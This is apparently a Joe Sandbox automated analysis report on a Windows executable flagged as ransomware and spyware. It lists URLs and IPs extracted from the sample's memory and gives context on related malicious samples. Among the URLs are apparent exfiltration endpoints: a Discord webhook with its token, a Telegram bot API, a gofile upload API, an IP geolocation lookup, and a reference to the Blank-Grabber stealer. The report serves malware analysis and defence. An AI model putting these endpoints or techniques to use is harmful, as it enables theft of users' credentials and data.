              https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870e45AiBoV6X.exe, 00000001.00000002.1988543492.000002290B7C2000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://www.msn.come45AiBoV6X.exe, 00000001.00000002.1988820175.000002290BF48000.00000004.00001000.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1982362710.000002290B8E8000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.1937080762.00000219519F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1843488107.0000029681972000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1862744633.00000296901BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1862744633.000002969007C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://discord.com/api/v9/users/e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963e45AiBoV6X.exe, 00000001.00000002.1987655713.000002290B2D0000.00000004.00001000.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.1872141468.0000021941981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1843488107.0000029680001000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://www.amazon.ca/e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B644000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://json.orge45AiBoV6X.exe, 00000001.00000002.1985975693.000002290ACD0000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxye45AiBoV6X.exe, 00000001.00000002.1987767316.000002290B3D0000.00000004.00001000.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688e45AiBoV6X.exe, 00000001.00000002.1985202264.000002290A618000.00000004.00001000.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000025.00000002.1843488107.000002968022A000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000006.00000002.1872141468.0000021941BA8000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000025.00000002.1843488107.000002968022A000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://go.micropowershell.exe, 00000025.00000002.1843488107.0000029681269000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readere45AiBoV6X.exe, 00000001.00000002.1984931538.000002290897F000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://www.amazon.com/e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B644000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://contoso.com/Iconpowershell.exe, 00000025.00000002.1862744633.000002969007C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=e45AiBoV6X.exe, 00000001.00000003.1833183214.000002290B14E000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://httpbin.org/e45AiBoV6X.exe, 00000001.00000003.1984164140.000002290AF88000.00000004.00000020.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0se45AiBoV6X.exe, 00000000.00000003.1719392220.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://canary.discord.com/api/webhooks/1248781366489907321/ufb6qyCKcRyE7syQfJqh1lNQR64inZBSWaeenuFVe45AiBoV6X.exe, 00000001.00000002.1987882294.000002290B4E0000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016e45AiBoV6X.exe, 00000001.00000003.1830286193.000002290B15C000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1829771493.000002290BB8B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1880836585.000002290BB8B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1986388661.000002290AF60000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://www.ecosia.org/newtab/e45AiBoV6X.exe, 00000001.00000003.1833183214.000002290B14E000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-bre45AiBoV6X.exe, 00000001.00000003.1764894979.000002290B065000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1766242664.000002290B164000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1764223855.000002290B164000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://github.com/Pester/Pesterpowershell.exe, 00000025.00000002.1843488107.000002968022A000.00000004.00000800.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://images-ext-1.discordapp.net/external/etSU0hGkd0ttMXA41AUjUl74oI1ajbez8WS2N-KLvK4/https/raw.ge45AiBoV6X.exe, 00000001.00000002.1987306791.000002290B039000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1982906328.000002290B033000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1986949781.000002290B00B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1986903181.000002290AFF2000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1984419770.000002290AFF0000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1982906328.000002290B00B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1983434642.000002290B038000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1983989604.000002290AFCF000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535e45AiBoV6X.exe, 00000001.00000002.1985975693.000002290AE6A000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sye45AiBoV6X.exe, 00000001.00000002.1984931538.000002290897F000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://MD8.mozilla.org/1/me45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B698000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://cdn.discordapp.com/attachments/1248781326262468744/1264315028736180234/Blank-user.rar?ex=66e45AiBoV6X.exe, 00000001.00000003.1982906328.000002290B033000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1983434642.000002290B038000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://ip-api.com/line/?fields=hostingre45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://bugzilla.moe45AiBoV6X.exe, 00000001.00000003.1881191624.000002290B113000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://tools.ietf.org/html/rfc6125#section-6.4.3e45AiBoV6X.exe, 00000001.00000002.1987767316.000002290B3D0000.00000004.00001000.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://api.telegram.org/bot%s/%s)e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000006.00000002.1872141468.0000021941BA8000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://google.com/maile45AiBoV6X.exe, 00000001.00000002.1986630728.000002290AF8B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1984164140.000002290AF88000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pye45AiBoV6X.exe, 00000001.00000002.1984931538.000002290897F000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://www.google.com/e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B698000.00000004.00001000.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://foss.heptapod.net/pypy/pypy/-/issues/3539e45AiBoV6X.exe, 00000001.00000002.1987655713.000002290B2D0000.00000004.00001000.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.e45AiBoV6X.exe, 00000001.00000002.1986388661.000002290AF7E000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1985975693.000002290ACD0000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://google.com/e45AiBoV6X.exe, 00000001.00000002.1985469081.000002290AA69000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://api.gofile.io/getServerre45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://ocsp.sectigo.com0e45AiBoV6X.exe, 00000000.00000003.1719392220.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://www.python.org/download/releases/2.3/mro/.e45AiBoV6X.exe, 00000001.00000002.1985753646.000002290AAD0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drfalse
              • URL Reputation: safe
              		unknown
              https://contoso.com/Licensepowershell.exe, 00000025.00000002.1862744633.000002969007C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://discordapp.com/api/v9/users/e45AiBoV6X.exe, 00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1738014114.000002290AE01000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://ip-api.com/json/?fields=225545re45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=e45AiBoV6X.exe, 00000001.00000003.1833183214.000002290B14E000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://github.com/urllib3/urllib3/issues/2920e45AiBoV6X.exe, 00000001.00000002.1987767316.000002290B3D0000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17e45AiBoV6X.exe, 00000001.00000003.1830286193.000002290B15C000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1829771493.000002290BB8B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1880836585.000002290BB8B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1986388661.000002290AF60000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#e45AiBoV6X.exe, 00000000.00000003.1719392220.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://yahoo.com/e45AiBoV6X.exe, 00000001.00000002.1986630728.000002290AF8B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1984164140.000002290AF88000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://account.bellmedia.ce45AiBoV6X.exe, 00000001.00000002.1988820175.000002290BF48000.00000004.00001000.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1982362710.000002290B8E8000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6e45AiBoV6X.exe, 00000001.00000002.1985975693.000002290AE6A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://login.microsoftonline.come45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B698000.00000004.00001000.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1988820175.000002290BF4C000.00000004.00001000.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1982362710.000002290B8E8000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://crl.thawte.com/ThawteTimestampingCA.crl0e45AiBoV6X.exe, 00000000.00000003.1719392220.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718378444.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://html.spec.whatwg.org/multipage/e45AiBoV6X.exe, 00000001.00000003.1785007830.000002290AEBB000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1986264729.000002290AEB5000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1764714930.000002290AEB7000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1881510721.000002290AEB4000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1983212942.000002290AEB4000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1835081648.000002290AEBB000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1789596748.000002290AEBB000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningse45AiBoV6X.exe, 00000001.00000002.1987655713.000002290B2D0000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://www.zhihu.com/e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B698000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searche45AiBoV6X.exe, 00000001.00000003.1833183214.000002290B14E000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://www.rfc-editor.org/rfc/rfc8259#section-8.1e45AiBoV6X.exe, 00000001.00000002.1986630728.000002290AF8B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1984164140.000002290AF88000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://contoso.com/powershell.exe, 00000025.00000002.1862744633.000002969007C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://oneget.orgXpowershell.exe, 00000025.00000002.1843488107.0000029681606000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.microsoftISPLA~1.PNGy.Le45AiBoV6X.exe, 00000001.00000002.1986774227.000002290AFCF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1983989604.000002290AFCF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://api.gofile.io/getServere45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pnge45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.1937080762.00000219519F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1843488107.0000029681972000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1862744633.00000296901BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1862744633.000002969007C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000025.00000002.1843488107.0000029681606000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://sectigo.com/CPS0e45AiBoV6X.exe, 00000000.00000003.1719392220.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://www.google.com/images/branding/product/ico/googleg_lodp.icoe45AiBoV6X.exe, 00000001.00000003.1833183214.000002290B14E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/Blank-c/Blank-GrabberrVe45AiBoV6X.exe, 00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1738014114.000002290AE01000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://www.amazon.co.uk/e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B644000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://ocsp.thawte.com0e45AiBoV6X.exe, 00000000.00000003.1719392220.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718378444.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngze45AiBoV6X.exe, 00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1738014114.000002290AE01000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://crl.comode45AiBoV6X.exe, 00000001.00000003.1761395137.000002290B00C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://www.python.org/dev/peps/pep-0205/e45AiBoV6X.exe, 00000000.00000003.1717679887.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1736201846.000002290AA3D000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1737797560.000002290AA3D000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1736689465.000002290AA40000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1737369965.000002290AA3D000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1725631506.000002290AA3D000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://www.wykop.pl/e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B644000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://twitter.com/e45AiBoV6X.exe, 00000001.00000002.1986630728.000002290AF8B000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1985975693.000002290ACD0000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000003.1984164140.000002290AF88000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://www.olx.pl/e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B698000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://support.mozilla.org/products/firefoxe45AiBoV6X.exe, 00000001.00000003.1764894979.000002290B065000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://google.com/e45AiBoV6X.exe, 00000001.00000003.1984164140.000002290AF88000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://google.com/mail/e45AiBoV6X.exe, 00000001.00000002.1985469081.000002290AA69000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://ac.ecosia.org/autocomplete?q=e45AiBoV6X.exe, 00000001.00000003.1833183214.000002290B14E000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://google.com/mail/e45AiBoV6X.exe, 00000001.00000002.1985975693.000002290AE6A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              208.95.112.1
              		ip-api.comUnited States
              		53334TUT-ASUSfalse
              162.159.137.232
              		canary.discord.comUnited States
              		13335CLOUDFLARENETUSfalse

              General Information

              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1477272
              Start date and time:2024-07-20 22:15:09 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 12m 14s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:88
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:e45AiBoV6X.exe
              renamed because original name is a hash value
              Original Sample Name:3e6d7972822636f67ccf275ebd140188.exe
              Detection:MAL
              Classification:mal100.rans.troj.spyw.expl.evad.winEXE@135/52@2/2
              EGA Information:
              • Successful, ratio: 60%
              HCA Information:
              • Successful, ratio: 94%
              • Number of executed functions: 116
              • Number of non-executed functions: 207
              Cookbook Comments:
              • Found application associated with file extension: .exe

              Warnings

              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
              • Excluded IPs from analysis (whitelisted): 142.250.185.195, 13.85.23.86, 20.166.126.56, 13.95.31.18
              • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, gstatic.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target powershell.exe, PID 1368 because it is empty
              • Execution Graph export aborted for target powershell.exe, PID 7544 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtCreateFile calls found.
              • Report size getting too big, too many NtCreateKey calls found.
              • Report size getting too big, too many NtEnumerateKey calls found.
              • Report size getting too big, too many NtOpenFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              16:16:10API Interceptor123x Sleep call for process: powershell.exe modified
              16:16:11API Interceptor5x Sleep call for process: WMIC.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              208.95.112.1iA8m9FfF5v.exeGet hashmaliciousDCRatBrowse
              • ip-api.com/line/?fields=hosting
              R6UcgOy5nE.rtfGet hashmaliciousAgentTesla, PureLog StealerBrowse
              • ip-api.com/line/?fields=hosting
              PR240614_ORDER.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
              • ip-api.com/line/?fields=hosting
              IEnetcache.htaGet hashmaliciousCobalt Strike, AgentTesla, PureLog StealerBrowse
              • ip-api.com/line/?fields=hosting
              winiti.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
              • ip-api.com/line/?fields=hosting
              payment_application.xlsGet hashmaliciousAgentTesla, PureLog StealerBrowse
              • ip-api.com/line/?fields=hosting
              0RA0ngi2c2.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
              • ip-api.com/line/?fields=hosting
              Payment swift copy103988.exeGet hashmaliciousAgentTeslaBrowse
              • ip-api.com/line/?fields=hosting
              Enquiry-Dubai.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
              • ip-api.com/line/?fields=hosting
              172131942401ffa05fff4c7d2b222e93d44117cc2a702a757a1aa7c5c6fc9cfeeacb380f89693.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
              • ip-api.com/line/?fields=hosting
              162.159.137.232http://mj-api.kun-ai.com/Get hashmaliciousUnknownBrowse
                0x000700000001ac52-36.exeGet hashmaliciousPython Stealer, Empyrean, Discord Token StealerBrowse
                  http://huoqu.26335442079873.workers.dev/Get hashmaliciousUnknownBrowse
                    Exter.exeGet hashmaliciousExela Stealer, Python StealerBrowse
                      golang-modules.exeGet hashmaliciousUnknownBrowse
                        setup.exeGet hashmaliciousBlank Grabber, Njrat, Umbral Stealer, XWormBrowse
                          SecuriteInfo.com.Trojan.Win64.Agent.14415.19839.exeGet hashmaliciousUnknownBrowse
                            https://prohubth.com/Get hashmaliciousUnknownBrowse
                              node.js.exeGet hashmaliciousUnknownBrowse
                                msupdate.exeGet hashmaliciousUnknownBrowse

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  ip-api.comiA8m9FfF5v.exeGet hashmaliciousDCRatBrowse
                                  • 208.95.112.1
                                  R6UcgOy5nE.rtfGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 208.95.112.1
                                  PR240614_ORDER.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                  • 208.95.112.1
                                  IEnetcache.htaGet hashmaliciousCobalt Strike, AgentTesla, PureLog StealerBrowse
                                  • 208.95.112.1
